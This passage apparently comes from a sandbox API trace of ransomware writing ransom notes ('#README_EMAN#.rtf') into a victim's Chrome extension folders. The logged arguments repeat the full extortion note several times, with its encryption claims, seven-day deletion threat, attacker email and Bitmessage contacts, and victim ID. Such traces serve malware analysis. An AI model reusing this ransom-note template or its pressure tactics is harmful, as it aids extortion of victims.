g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.219] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.220] CloseHandle (hObject=0x294) returned 1 [0278.220] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0278.220] GetLastError () returned 0x2 [0278.220] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 